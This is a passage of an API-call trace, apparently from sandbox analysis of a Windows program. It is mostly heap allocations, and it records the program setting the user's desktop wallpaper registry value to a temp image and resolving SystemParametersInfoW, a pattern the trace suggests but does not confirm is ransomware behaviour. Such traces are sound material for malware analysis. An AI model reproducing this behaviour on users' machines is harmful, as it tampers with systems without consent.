[0282.868] Sleep (dwMilliseconds=0xa) [0282.943] timeGetTime () returned 0x1186de4 [0282.943] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51970 | out: hHeap=0x970000) returned 1 [0282.943] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519d0 | out: hHeap=0x970000) returned 1 [0282.943] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0282.943] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51910 [0282.943] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ad8 [0282.943] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c18 [0282.943] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51970 [0282.943] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0282.943] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51988 [0282.944] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b58 [0282.944] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a00 [0282.944] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b58 | out: hHeap=0x970000) returned 1 [0282.944] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a30 [0282.944] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54be8 [0282.944] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518f8 [0282.944] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54be8 | out: hHeap=0x970000) returned 1 [0282.944] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a48 [0282.944] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b98 [0282.944] GetTempPathW (in: nBufferLength=0x104, lpBuffer=0x8cf560 | out: lpBuffer="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\") returned 0x23 [0282.944] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b38 [0282.944] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x50) returned 0x2e54858 [0282.944] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ba8 [0282.944] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ca8 [0282.944] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69bc8 [0282.944] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b20 [0282.944] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xb0) returned 0x978270 [0282.945] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54858 | out: hHeap=0x970000) returned 1 [0282.945] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b20 | out: hHeap=0x970000) returned 1 [0282.945] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69bc8 | out: hHeap=0x970000) returned 1 [0282.945] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ca8 | out: hHeap=0x970000) returned 1 [0282.945] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b98 | out: hHeap=0x970000) returned 1 [0282.945] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b50 [0282.945] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c48 [0282.945] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518c8 [0282.945] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b78 [0282.945] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a18 [0282.945] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c18 [0282.945] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0282.945] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b48 [0282.945] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a18 | out: hHeap=0x970000) returned 1 [0282.945] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7e980 [0282.945] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0282.945] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0282.945] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b98 [0282.945] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a60 [0282.946] CharUpperBuffW (in: lpsz="HKCU", cchLength=0x4 | out: lpsz="HKCU") returned 0x4 [0282.946] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ac0 [0282.946] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b58 [0282.946] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ac0 | out: hHeap=0x970000) returned 1 [0282.946] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b58 | out: hHeap=0x970000) returned 1 [0282.946] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a60 | out: hHeap=0x970000) returned 1 [0282.946] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b98 | out: hHeap=0x970000) returned 1 [0282.946] RegCreateKeyExW (in: hKey=0x80000001, lpSubKey="Control Panel\\Desktop", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0x20006, lpSecurityAttributes=0x0, phkResult=0x8cf850, lpdwDisposition=0x8cf86c | out: phkResult=0x8cf850*=0x2d0, lpdwDisposition=0x8cf86c*=0x2) returned 0x0 [0282.946] RegSetValueExW (in: hKey=0x2d0, lpValueName="Wallpaper", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\wl.jpg", cbData=0x54 | out: lpData="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\wl.jpg") returned 0x0 [0282.947] RegCloseKey (hKey=0x2d0) returned 0x0 [0282.947] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7e980 | out: hHeap=0x970000) returned 1 [0282.947] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0282.947] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518c8 | out: hHeap=0x970000) returned 1 [0282.947] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b78 | out: hHeap=0x970000) returned 1 [0282.947] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b50 | out: hHeap=0x970000) returned 1 [0282.947] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c48 | out: hHeap=0x970000) returned 1 [0282.947] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51970 | out: hHeap=0x970000) returned 1 [0282.947] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ad8 | out: hHeap=0x970000) returned 1 [0282.947] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a00 | out: hHeap=0x970000) returned 1 [0282.947] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51988 | out: hHeap=0x970000) returned 1 [0282.947] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518f8 | out: hHeap=0x970000) returned 1 [0282.947] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a30 | out: hHeap=0x970000) returned 1 [0282.947] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978270 | out: hHeap=0x970000) returned 1 [0282.947] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ba8 | out: hHeap=0x970000) returned 1 [0282.947] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b38 | out: hHeap=0x970000) returned 1 [0282.947] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a48 | out: hHeap=0x970000) returned 1 [0282.948] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51910 | out: hHeap=0x970000) returned 1 [0282.948] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0282.948] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b28 [0282.948] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c88 [0282.948] CharUpperBuffW (in: lpsz="_WINAPI_SYSTEMPARAMETERSINFO", cchLength=0x1c | out: lpsz="_WINAPI_SYSTEMPARAMETERSINFO") returned 0x1c [0282.948] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0282.948] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c88 | out: hHeap=0x970000) returned 1 [0282.948] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ac0 [0282.948] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54b68 [0282.948] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a48 [0282.948] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51bb0 [0282.948] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ba8 [0282.948] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ba8 | out: hHeap=0x970000) returned 1 [0282.948] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54c88 [0282.948] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51aa8 [0282.948] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bc8 [0282.948] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bc8 | out: hHeap=0x970000) returned 1 [0282.948] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e519d0 [0282.948] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79310 [0282.948] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b20 [0282.948] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c18 [0282.949] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519e8 [0282.949] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79338 [0282.949] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51970 [0282.949] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c98 [0282.949] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ad8 [0282.949] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51af0 [0282.949] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51a60 [0282.949] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e518f8 [0282.949] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ba8 [0282.949] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ba8 | out: hHeap=0x970000) returned 1 [0282.949] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54558 [0282.949] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b38 [0282.949] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cb8 [0282.949] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519b8 [0282.949] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a60 | out: hHeap=0x970000) returned 1 [0282.949] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518f8 | out: hHeap=0x970000) returned 1 [0282.949] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51af0 | out: hHeap=0x970000) returned 1 [0282.949] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51988 [0282.949] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51b50 [0282.950] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51a00 [0282.950] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c08 [0282.950] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0282.950] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54288 [0282.950] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51af0 [0282.950] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c28 [0282.950] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519a0 [0282.950] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b50 | out: hHeap=0x970000) returned 1 [0282.950] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a00 | out: hHeap=0x970000) returned 1 [0282.950] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51988 | out: hHeap=0x970000) returned 1 [0282.950] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78618 [0282.950] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0282.950] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b80 [0282.950] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b78 [0282.950] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51988 [0282.950] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b98 [0282.950] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ba8 [0282.950] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54440 [0282.951] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518c8 [0282.951] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c38 [0282.951] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a00 [0282.951] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a60 [0282.951] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c08 [0282.951] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51988 | out: hHeap=0x970000) returned 1 [0282.951] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a78 [0282.951] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b68 [0282.951] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b48 [0282.951] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518f8 [0282.951] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0282.951] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51910 [0282.951] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b88 [0282.951] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51988 [0282.952] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b88 | out: hHeap=0x970000) returned 1 [0282.952] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51928 [0282.952] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c68 [0282.952] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b08 [0282.952] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c68 | out: hHeap=0x970000) returned 1 [0282.952] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b50 [0282.952] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ca8 [0282.952] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a90 [0282.952] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ca8 | out: hHeap=0x970000) returned 1 [0282.952] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e543c8 [0282.952] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a78 | out: hHeap=0x970000) returned 1 [0282.952] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51940 [0282.952] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b48 [0282.952] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0282.952] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a30 [0282.952] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c68 [0282.952] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a18 [0282.953] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c68 | out: hHeap=0x970000) returned 1 [0282.953] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a78 [0282.953] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bb8 [0282.953] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bb8 | out: hHeap=0x970000) returned 1 [0282.953] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51df0 [0282.953] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b28 [0282.953] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51cd0 [0282.953] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b28 | out: hHeap=0x970000) returned 1 [0282.953] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0282.954] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e543c8 | out: hHeap=0x970000) returned 1 [0282.954] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d18 [0282.954] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cf8 [0282.954] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0282.954] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51dc0 [0282.954] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c68 [0282.954] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d30 [0282.954] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c68 | out: hHeap=0x970000) returned 1 [0282.954] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e38 [0282.954] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bc8 [0282.954] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bc8 | out: hHeap=0x970000) returned 1 [0282.954] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c48 [0282.954] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e98 [0282.954] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0282.954] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51cb8 [0282.954] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b48 [0282.954] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b28 [0282.954] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51bf8 [0282.954] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51cb8 | out: hHeap=0x970000) returned 1 [0282.954] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0282.955] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bf8 | out: hHeap=0x970000) returned 1 [0282.955] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b28 | out: hHeap=0x970000) returned 1 [0282.955] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d60 [0282.955] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c68 [0282.955] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51dd8 [0282.955] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ca8 [0282.955] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cc8 [0282.955] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51bc8 [0282.955] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51dd8 | out: hHeap=0x970000) returned 1 [0282.955] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ca8 | out: hHeap=0x970000) returned 1 [0282.955] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bc8 | out: hHeap=0x970000) returned 1 [0282.955] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0282.955] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ca8 [0282.955] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e80 [0282.955] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cc8 [0282.955] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cd8 [0282.955] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e50 [0282.955] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e80 | out: hHeap=0x970000) returned 1 [0282.955] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0282.955] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e50 | out: hHeap=0x970000) returned 1 [0282.955] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0282.955] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bc8 [0282.956] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51dd8 [0282.956] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cc8 [0282.956] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cd8 [0282.956] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d78 [0282.956] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51dd8 | out: hHeap=0x970000) returned 1 [0282.956] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0282.956] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d78 | out: hHeap=0x970000) returned 1 [0282.956] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0282.956] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b28 [0282.956] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e20 [0282.956] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cc8 [0282.956] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cd8 [0282.956] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ce8 [0282.956] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e20 | out: hHeap=0x970000) returned 1 [0282.956] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0282.956] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ce8 | out: hHeap=0x970000) returned 1 [0282.956] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0282.956] LoadLibraryW (lpLibFileName="user32.dll") returned 0x750c0000 [0282.957] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e50 [0282.957] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cd8 [0282.957] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SystemParametersInfoW", cchWideChar=22, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 22 [0282.957] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x16) returned 0x2e69928 [0282.957] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SystemParametersInfoW", cchWideChar=22, lpMultiByteStr=0x2e69928, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SystemParametersInfoW", lpUsedDefaultChar=0x0) returned 22 [0282.957] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e50 | out: hHeap=0x970000) returned 1 [0282.957] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e540d0 [0282.957] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69928 | out: hHeap=0x970000) returned 1 [0282.957] GetProcAddress (hModule=0x750c0000, lpProcName="SystemParametersInfoW") returned 0x750ef210 [0282.957] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e540d0 | out: hHeap=0x970000) returned 1 [0282.957] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0282.957] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51eb0 [0282.958] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cc8 [0282.958] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cd8 [0282.958] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b88 [0282.958] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 